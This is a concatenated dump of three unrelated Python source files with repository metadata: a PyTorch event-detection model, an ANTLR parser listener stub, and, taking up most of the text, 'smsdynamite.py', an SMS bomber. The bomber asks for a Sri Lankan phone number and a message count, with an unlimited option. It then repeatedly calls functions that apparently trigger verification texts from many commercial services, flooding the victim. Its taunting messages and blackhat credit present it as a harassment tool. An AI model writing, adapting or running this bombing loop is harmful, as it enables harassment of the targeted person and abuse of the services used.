from mutransformers.models.gpt2.configuration_gpt2 import * | 59.333333 | 65 | 0.867978 | 42 | 356 | 7.214286 | 0.214286 | 0.356436 | 0.475248 | 0.49505 | 0.640264 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012012 | 0.064607 | 356 | 6 | 66 | 59.333333 | 0.897898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
40c848e30afe59457e1738b217662852caab91a7 | 8,616 | py | Python | baselines/DMBERT/model.py | LyricZhao/MAVEN-dataset | 37bbce69683ee6667783d9fbf6300e33fe8c2e41 | [
"MIT"
] | null | null | null | baselines/DMBERT/model.py | LyricZhao/MAVEN-dataset | 37bbce69683ee6667783d9fbf6300e33fe8c2e41 | [
"MIT"
] | null | null | null | baselines/DMBERT/model.py | LyricZhao/MAVEN-dataset | 37bbce69683ee6667783d9fbf6300e33fe8c2e41 | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss
from transformers import BertPreTrainedModel, BertModel, AlbertPreTrainedModel, AlbertModel, DebertaModel, DebertaPreTrainedModel, DebertaV2Model, DebertaV2PreTrainedModel, XLNetModel, XLNetPreTrainedModel
class DMBERT(BertPreTrainedModel):
def __init__(self,config):
super().__init__(config)
self.bert=BertModel(config)
self.dropout=nn.Dropout(config.hidden_dropout_prob)
self.maxpooling=nn.MaxPool1d(128)
self.classifier=nn.Linear(config.hidden_size*2,config.num_labels)
def forward(self,input_ids=None,attention_mask=None,token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
batchSize=input_ids.size(0)
outputs =self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
)
conved=outputs[0]
conved=conved.transpose(1,2)
conved=conved.transpose(0,1)
L=(conved*maskL).transpose(0,1)
R=(conved*maskR).transpose(0,1)
L=L+torch.ones_like(L)
R=R+torch.ones_like(R)
pooledL=self.maxpooling(L).contiguous().view(batchSize,self.config.hidden_size)
pooledR=self.maxpooling(R).contiguous().view(batchSize,self.config.hidden_size)
pooled=torch.cat((pooledL,pooledR),1)
pooled=pooled-torch.ones_like(pooled)
pooled=self.dropout(pooled)
logits=self.classifier(pooled)
reshaped_logits=logits.view(-1, self.config.num_labels)
outputs = (reshaped_logits,) + outputs[2:]
if labels is not None:
loss_fct=CrossEntropyLoss()
loss=loss_fct(reshaped_logits, labels)
outputs=(loss,)+outputs
return outputs
class DMALBERT(AlbertPreTrainedModel):
def __init__(self,config):
super().__init__(config)
self.albert=AlbertModel(config)
self.dropout=nn.Dropout(config.hidden_dropout_prob)
self.maxpooling=nn.MaxPool1d(128)
self.classifier=nn.Linear(config.hidden_size*2,config.num_labels)
def forward(self,input_ids=None,attention_mask=None,token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
batchSize=input_ids.size(0)
outputs =self.albert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
)
conved=outputs[0]
conved=conved.transpose(1,2)
conved=conved.transpose(0,1)
L=(conved*maskL).transpose(0,1)
R=(conved*maskR).transpose(0,1)
L=L+torch.ones_like(L)
R=R+torch.ones_like(R)
pooledL=self.maxpooling(L).contiguous().view(batchSize,self.config.hidden_size)
pooledR=self.maxpooling(R).contiguous().view(batchSize,self.config.hidden_size)
pooled=torch.cat((pooledL,pooledR),1)
pooled=pooled-torch.ones_like(pooled)
pooled=self.dropout(pooled)
logits=self.classifier(pooled)
reshaped_logits=logits.view(-1, self.config.num_labels)
outputs = (reshaped_logits,) + outputs[2:]
if labels is not None:
loss_fct=CrossEntropyLoss()
loss=loss_fct(reshaped_logits, labels)
outputs=(loss,)+outputs
return outputs
class DMDEBERTA(DebertaPreTrainedModel):
def __init__(self,config):
super().__init__(config)
self.deberta=DebertaModel(config)
self.dropout=nn.Dropout(config.hidden_dropout_prob)
self.maxpooling=nn.MaxPool1d(128)
self.classifier=nn.Linear(config.hidden_size*2,config.num_labels)
def forward(self,input_ids=None,attention_mask=None,token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
batchSize=input_ids.size(0)
outputs =self.deberta(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
inputs_embeds=inputs_embeds,
)
conved=outputs[0]
conved=conved.transpose(1,2)
conved=conved.transpose(0,1)
L=(conved*maskL).transpose(0,1)
R=(conved*maskR).transpose(0,1)
L=L+torch.ones_like(L)
R=R+torch.ones_like(R)
pooledL=self.maxpooling(L).contiguous().view(batchSize,self.config.hidden_size)
pooledR=self.maxpooling(R).contiguous().view(batchSize,self.config.hidden_size)
pooled=torch.cat((pooledL,pooledR),1)
pooled=pooled-torch.ones_like(pooled)
pooled=self.dropout(pooled)
logits=self.classifier(pooled)
reshaped_logits=logits.view(-1, self.config.num_labels)
outputs = (reshaped_logits,) + outputs[2:]
if labels is not None:
loss_fct=CrossEntropyLoss()
loss=loss_fct(reshaped_logits, labels)
outputs=(loss,)+outputs
return outputs
class DMDEBERTAV2(DebertaV2PreTrainedModel):
def __init__(self,config):
super().__init__(config)
self.deberta=DebertaV2Model(config)
self.dropout=nn.Dropout(config.hidden_dropout_prob)
self.maxpooling=nn.MaxPool1d(128)
self.classifier=nn.Linear(config.hidden_size*2,config.num_labels)
def forward(self,input_ids=None,attention_mask=None,token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
batchSize=input_ids.size(0)
outputs =self.deberta(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
inputs_embeds=inputs_embeds,
)
conved=outputs[0]
conved=conved.transpose(1,2)
conved=conved.transpose(0,1)
L=(conved*maskL).transpose(0,1)
R=(conved*maskR).transpose(0,1)
L=L+torch.ones_like(L)
R=R+torch.ones_like(R)
pooledL=self.maxpooling(L).contiguous().view(batchSize,self.config.hidden_size)
pooledR=self.maxpooling(R).contiguous().view(batchSize,self.config.hidden_size)
pooled=torch.cat((pooledL,pooledR),1)
pooled=pooled-torch.ones_like(pooled)
pooled=self.dropout(pooled)
logits=self.classifier(pooled)
reshaped_logits=logits.view(-1, self.config.num_labels)
outputs = (reshaped_logits,) + outputs[2:]
if labels is not None:
loss_fct=CrossEntropyLoss()
loss=loss_fct(reshaped_logits, labels)
outputs=(loss,)+outputs
return outputs
class DMXLNET(XLNetPreTrainedModel):
def __init__(self,config):
super().__init__(config)
self.xlnet=XLNetModel(config)
self.dropout=nn.Dropout(config.dropout)
self.maxpooling=nn.MaxPool1d(128)
self.classifier=nn.Linear(config.hidden_size*2,config.num_labels)
def forward(self,input_ids=None,attention_mask=None,token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, maskL=None, maskR=None, labels=None):
batchSize=input_ids.size(0)
outputs =self.xlnet(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
)
conved=outputs[0]
conved=conved.transpose(1,2)
conved=conved.transpose(0,1)
L=(conved*maskL).transpose(0,1)
R=(conved*maskR).transpose(0,1)
L=L+torch.ones_like(L)
R=R+torch.ones_like(R)
pooledL=self.maxpooling(L).contiguous().view(batchSize,self.config.hidden_size)
pooledR=self.maxpooling(R).contiguous().view(batchSize,self.config.hidden_size)
pooled=torch.cat((pooledL,pooledR),1)
pooled=pooled-torch.ones_like(pooled)
pooled=self.dropout(pooled)
logits=self.classifier(pooled)
reshaped_logits=logits.view(-1, self.config.num_labels)
outputs = (reshaped_logits,) + outputs[2:]
if labels is not None:
loss_fct=CrossEntropyLoss()
loss=loss_fct(reshaped_logits, labels)
outputs=(loss,)+outputs
return outputs | 44.412371 | 205 | 0.670032 | 1,076 | 8,616 | 5.16171 | 0.080855 | 0.03601 | 0.043212 | 0.021606 | 0.901873 | 0.901873 | 0.896111 | 0.896111 | 0.876665 | 0.861181 | 0 | 0.014101 | 0.218083 | 8,616 | 194 | 206 | 44.412371 | 0.810301 | 0 | 0 | 0.867725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05291 | false | 0 | 0.031746 | 0 | 0.137566 | 0.005291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
90525bf287040609d34275757dcb2cfa680f168c | 19,286 | py | Python | smsdynamite.py | MRTech-Ev/SmS-Dynamite | 9dfecf555149eaa116fdb6c80180e869e0a9bb51 | [
"Apache-2.0"
] | null | null | null | smsdynamite.py | MRTech-Ev/SmS-Dynamite | 9dfecf555149eaa116fdb6c80180e869e0a9bb51 | [
"Apache-2.0"
] | null | null | null | smsdynamite.py | MRTech-Ev/SmS-Dynamite | 9dfecf555149eaa116fdb6c80180e869e0a9bb51 | [
"Apache-2.0"
] | 1 | 2021-02-08T06:54:03.000Z | 2021-02-08T06:54:03.000Z | import os,random,sys,time
from urllib import request
from api import *
import codecs
cle = 'clear' if os.name == 'posix' else 'cls'
from colorama import Fore,init,Style
init(autoreset=True)
os.system(cle)
fore=['\x1b[91m','\x1b[34m','\x1b[36m','\x1b[93m','\x1b[32m','\x1b[35m','\x1b[31m','\x1b[94m','\x1b[96m','\x1b[92m','\x1b[33m','\x1b[95m']
logo=("""
+----------------------------------------------------------------------+
| |
| ______________________________ . \ | / . |
| / / \ \ \ / / |
| | By MRTech |{========= >- -< |
| \____________________________\_/ / / \ \ |
| . / | \ . |
| |
+----------------------------------------------------------------------+
""")
bar='**_____________________________________**'
print(bar+'\n')
print(logo)
print(bar+'\n')
time.sleep(0.3)
print ("""
1) SMS Bomber
2) Coming Soon
3) Coming Soon
4) About
5) Exit""")
def prsent(count,num):
sys.stdout.write('\r' +random.choice(fore) +Style.BRIGHT+'\t[*]'+' Bombing '+str(num)+'\t'+str(count)+' Sent')
sys.stdout.flush()
def Spinner():
l=['|','/','-','\\']
for i in l+l+l:
sys.stdout.write('\r'+Style.BRIGHT+Fore.LIGHTYELLOW_EX+'[*]Checking Network... Please Wait '+i)
sys.stdout.flush()
time.sleep(0.2)
time.sleep(0.3)
while True:
try:
cho=int(input(Fore.LIGHTCYAN_EX+Style.BRIGHT+'Enter Your Choice: '))
if cho > 0 and cho <6:
break
else:
Print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Please Enter A Correct Choice!')
except:
print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Your Choice is Incorrect')
if cho==1:
time.sleep(0.4)
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
try:
Spinner()
request.urlopen('https://httpbin.org/get')
print(Fore.LIGHTGREEN_EX+Style.BRIGHT+'\n[+] Well Done Successfully Connected!')
time.sleep(1.5)
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
except:
time.sleep(0.4)
print(Fore.LIGHTRED_EX+Style.BRIGHT+'\n[!] Fail to Connect. Please Try Again!')
time.sleep(0.3)
print(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Turn On Your Network...')
time.sleep(0.3)
input(Fore.LIGHTRED_EX+Style.BRIGHT+'[!] Exit...\n Press Enter to Return...')
exit()
while True:
try:
num=int(input(Style.BRIGHT+'Type Your Target Mobile Number (07xxxxxxxx): '))
num='0'+str(num)
if len(num) == 10 and str(num)[0:3] in ('070','071','072','075','076','077','078'):
break
else:
print(Fore.LIGHTRED_EX + 'Mobile Number is Incorrect!')
continue
except ValueError:
print(Fore.LIGHTRED_EX + 'Mobile Number is Incorrect!')
continue
time.sleep(0.4)
while True:
times=input(Style.BRIGHT+Fore.LIGHTYELLOW_EX+'How Many Messages You Want Sent ? Unlimited = (U):')
if times.isnumeric() or times == 'U' or times == 'u':
break
else:
print(Style.BRIGHT+Fore.LIGHTRED_EX+'[!] Type Correct Amount or \'U\' Unlimited')
time.sleep(0.4)
while True:
delay=input(Style.BRIGHT+Fore.LIGHTMAGENTA_EX+'Delay Time in (Seconds)\n\t\t[Recomended 5]:')
if delay.isnumeric() and int(delay) > 0:
delay=float(delay)
break
elif delay=='0':
print(Style.BRIGHT+Fore.LIGHTRED_EX+'[!] Type 0+ Value')
else:
delay=5.0
break
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
time.sleep(0.5)
print('\t{Style.BRIGHT}දැන් සැපද කෙලිය නේද ඌටත්...\n\t Help : https://t.me/MRTechGg \n\t Based on SL Bomber[https://github.com/Sl-Sanda-Ru/Sl-Bomber.git]' )
print(bar+'\n')
print(Fore.YELLOW+Style.BRIGHT+'\tYou Want Stop Press Ctrl+c')
if num[0:3] == '077' or num[0:3] == '076':
count=0
if times.isnumeric():
while count< int(times):
mega(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
mega(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '071' or num[0:3] == '070':
count=0
if times.isnumeric():
while count< int(times):
dtamart(num,delay)
count+=1
prsent(count,num)
if count<int(times):
dtamart2(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count< int(times):
mobself(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
dtamart(num,delay)
count+=1
prsent(count,num)
dtamart2(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
mobself(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '078' or num[0:3] == '072':
count=0
if times.isnumeric():
while count< int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutself(num,delay)
count+=1
prsent(count,num)
if count<int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
hutcliq(num,delay)
count+=1
prsent(count,num)
hutself(num,delay)
count+=1
prsent(count,num)
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
elif num[0:3] == '075':
count=0
if times.isnumeric():
while count< int(times):
yogo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
guru(num,delay)
count+=1
prsent(count,num)
if count<int(times):
kangaroo(num,delay)
count+=1
prsent(count,num)
if count<int(times):
pat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
doc(num,delay)
count+=1
prsent(count,num)
if count<int(times):
idea(num,delay)
count+=1
prsent(count,num)
if count<int(times):
sing(num,delay)
count+=1
prsent(count,num)
if count<int(times):
ona(num,delay)
count+=1
prsent(count,num)
if count<int(times):
airbnb(num,delay)
count+=1
prsent(count,num)
if count<int(times):
flipkrt(num,delay)
count+=1
prsent(count,num)
if count<int(times):
savari(num,delay)
count+=1
prsent(count,num)
if count<int(times):
youcab(num,delay)
count+=1
prsent(count,num)
if count<int(times):
hutcliq(num,delay)
count+=1
prsent(count,num)
if count<int(times):
nanasa(num,delay)
count+=1
prsent(count,num)
if count<int(times):
domin(num,delay)
count+=1
prsent(count,num)
if count< int(times):
slmat(num,delay)
count+=1
prsent(count,num)
if count<int(times):
echan(num,delay)
count+=1
prsent(count,num)
if count<int(times):
oli(num,delay)
count+=1
prsent(count,num)
else:
while True:
yogo(num,delay)
count+=1
prsent(count,num)
guru(num,delay)
count+=1
prsent(count,num)
kangaroo(num,delay)
count+=1
prsent(count,num)
airbnb(num,delay)
count+=1
prsent(count,num)
pat(num,delay)
count+=1
prsent(count,num)
sing(num,delay)
count+=1
prsent(count,num)
doc(num,delay)
count+=1
prsent(count,num)
idea(num,delay)
count+=1
prsent(count,num)
ona(num,delay)
count+=1
prsent(count,num)
flipkrt(num,delay)
count+=1
prsent(count,num)
savari(num,delay)
count+=1
prsent(count,num)
youcab(num,delay)
count+=1
prsent(count,num)
hutcliq(num,delay)
count+=1
prsent(count,num)
slmat(num,count)
count+=1
prsent(count,num)
nanasa(num,delay)
count+=1
prsent(count,num)
domin(num,delay)
count+=1
prsent(count,num)
echan(num,delay)
count+=1
prsent(count,num)
oli(num,delay)
count+=2
prsent(count,num)
print('\n'+bar+'\n')
time.sleep(0.90)
print('{Style.BRIGHT}{Fore.LIGHTGREEN_EX}\t[+] Hehe Wow Dynamite එක ඌගෙ Phone එකේ පිපුරුවෝ !')
time.sleep(0.75)
ag=input('\t{Style.BRIGHT}{random.choice(fore)}[?] තව කාටද කෙලවන්න ඔනෙ?(y/n) ')
if ag == 'Y' or ag == 'y':
os.system('python3 smsdynamite.py')
else:
exit()
elif cho == 2:
os.system('python3 smsdynamite.py')
elif cho == 3:
os.system('python3 smsdynamite.py')
elif cho == 4:
os.system(cle)
print(bar+'\n')
print(logo)
print(bar+'\n')
print("""
Developed By MRTech
Evilz Team
__________
BLACKHAT SriLanka
""")
agd=input('\t{Style.BRIGHT}{random.choice(fore)}[?] Go Main Menu (y/n): ')
if agd == 'Y' or agd == 'y':
os.system('python3 smsdynamite.py')
else:
exit() | 27.201693 | 158 | 0.474645 | 2,276 | 19,286 | 3.976274 | 0.102373 | 0.190829 | 0.242873 | 0.285525 | 0.815249 | 0.802873 | 0.783204 | 0.760663 | 0.738232 | 0.712376 | 0 | 0.026247 | 0.387587 | 19,286 | 709 | 159 | 27.201693 | 0.738549 | 0 | 0 | 0.895184 | 0 | 0.005666 | 0.11147 | 0.021099 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.007082 | 0 | 0.009915 | 0.042493 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
905c0c78fd6368ef7df6a6b2bf6732c14ec6eea6 | 26,459 | py | Python | pymacer-vscode/AntlrGrammar/Python3WalkListener.py | purushottamkar/pymacer | bf28ce9dd87e47e1957ccf0ca308b55aaf4af1c9 | [
"MIT"
] | 1 | 2021-07-06T13:51:07.000Z | 2021-07-06T13:51:07.000Z | pymacer-vscode/AntlrGrammar/Python3WalkListener.py | purushottamkar/pymacer | bf28ce9dd87e47e1957ccf0ca308b55aaf4af1c9 | [
"MIT"
] | null | null | null | pymacer-vscode/AntlrGrammar/Python3WalkListener.py | purushottamkar/pymacer | bf28ce9dd87e47e1957ccf0ca308b55aaf4af1c9 | [
"MIT"
] | null | null | null | from antlr4 import *
from AntlrGrammar.Python3Listener import Python3Listener
from AntlrGrammar.Python3Parser import Python3Parser
class Python3WalkListener(Python3Listener):
# Enter a parse tree produced by Python3Parser#single_input.
def enterSingle_input(self, ctx: Python3Parser.Single_inputContext):
pass
# Exit a parse tree produced by Python3Parser#single_input.
def exitSingle_input(self, ctx: Python3Parser.Single_inputContext):
pass
# Enter a parse tree produced by Python3Parser#file_input.
def enterFile_input(self, ctx: Python3Parser.File_inputContext):
pass
# Exit a parse tree produced by Python3Parser#file_input.
def exitFile_input(self, ctx: Python3Parser.File_inputContext):
pass
# Enter a parse tree produced by Python3Parser#eval_input.
def enterEval_input(self, ctx: Python3Parser.Eval_inputContext):
pass
# Exit a parse tree produced by Python3Parser#eval_input.
def exitEval_input(self, ctx: Python3Parser.Eval_inputContext):
pass
# Enter a parse tree produced by Python3Parser#decorator.
def enterDecorator(self, ctx: Python3Parser.DecoratorContext):
pass
# Exit a parse tree produced by Python3Parser#decorator.
def exitDecorator(self, ctx: Python3Parser.DecoratorContext):
pass
# Enter a parse tree produced by Python3Parser#decorators.
def enterDecorators(self, ctx: Python3Parser.DecoratorsContext):
pass
# Exit a parse tree produced by Python3Parser#decorators.
def exitDecorators(self, ctx: Python3Parser.DecoratorsContext):
pass
# Enter a parse tree produced by Python3Parser#decorated.
def enterDecorated(self, ctx: Python3Parser.DecoratedContext):
pass
# Exit a parse tree produced by Python3Parser#decorated.
def exitDecorated(self, ctx: Python3Parser.DecoratedContext):
pass
# Enter a parse tree produced by Python3Parser#async_funcdef.
def enterAsync_funcdef(self, ctx: Python3Parser.Async_funcdefContext):
pass
# Exit a parse tree produced by Python3Parser#async_funcdef.
def exitAsync_funcdef(self, ctx: Python3Parser.Async_funcdefContext):
pass
# Enter a parse tree produced by Python3Parser#funcdef.
def enterFuncdef(self, ctx: Python3Parser.FuncdefContext):
pass
# Exit a parse tree produced by Python3Parser#funcdef.
def exitFuncdef(self, ctx: Python3Parser.FuncdefContext):
pass
# Enter a parse tree produced by Python3Parser#parameters.
def enterParameters(self, ctx: Python3Parser.ParametersContext):
pass
# Exit a parse tree produced by Python3Parser#parameters.
def exitParameters(self, ctx: Python3Parser.ParametersContext):
pass
# Enter a parse tree produced by Python3Parser#typedargslist.
def enterTypedargslist(self, ctx: Python3Parser.TypedargslistContext):
pass
# Exit a parse tree produced by Python3Parser#typedargslist.
def exitTypedargslist(self, ctx: Python3Parser.TypedargslistContext):
pass
# Enter a parse tree produced by Python3Parser#tfpdef.
def enterTfpdef(self, ctx: Python3Parser.TfpdefContext):
pass
# Exit a parse tree produced by Python3Parser#tfpdef.
def exitTfpdef(self, ctx: Python3Parser.TfpdefContext):
pass
# Enter a parse tree produced by Python3Parser#varargslist.
def enterVarargslist(self, ctx: Python3Parser.VarargslistContext):
pass
# Exit a parse tree produced by Python3Parser#varargslist.
def exitVarargslist(self, ctx: Python3Parser.VarargslistContext):
pass
# Enter a parse tree produced by Python3Parser#vfpdef.
def enterVfpdef(self, ctx: Python3Parser.VfpdefContext):
pass
# Exit a parse tree produced by Python3Parser#vfpdef.
def exitVfpdef(self, ctx: Python3Parser.VfpdefContext):
pass
# Enter a parse tree produced by Python3Parser#stmt.
def enterStmt(self, ctx: Python3Parser.StmtContext):
pass
# Exit a parse tree produced by Python3Parser#stmt.
def exitStmt(self, ctx: Python3Parser.StmtContext):
pass
# Enter a parse tree produced by Python3Parser#simple_stmt.
def enterSimple_stmt(self, ctx: Python3Parser.Simple_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#simple_stmt.
def exitSimple_stmt(self, ctx: Python3Parser.Simple_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#small_stmt.
def enterSmall_stmt(self, ctx: Python3Parser.Small_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#small_stmt.
def exitSmall_stmt(self, ctx: Python3Parser.Small_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#expr_stmt.
def enterExpr_stmt(self, ctx: Python3Parser.Expr_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#expr_stmt.
def exitExpr_stmt(self, ctx: Python3Parser.Expr_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#annassign.
def enterAnnassign(self, ctx: Python3Parser.AnnassignContext):
pass
# Exit a parse tree produced by Python3Parser#annassign.
def exitAnnassign(self, ctx: Python3Parser.AnnassignContext):
pass
# Enter a parse tree produced by Python3Parser#testlist_star_expr.
def enterTestlist_star_expr(self, ctx: Python3Parser.Testlist_star_exprContext):
pass
# Exit a parse tree produced by Python3Parser#testlist_star_expr.
def exitTestlist_star_expr(self, ctx: Python3Parser.Testlist_star_exprContext):
pass
# Enter a parse tree produced by Python3Parser#augassign.
def enterAugassign(self, ctx: Python3Parser.AugassignContext):
pass
# Exit a parse tree produced by Python3Parser#augassign.
def exitAugassign(self, ctx: Python3Parser.AugassignContext):
pass
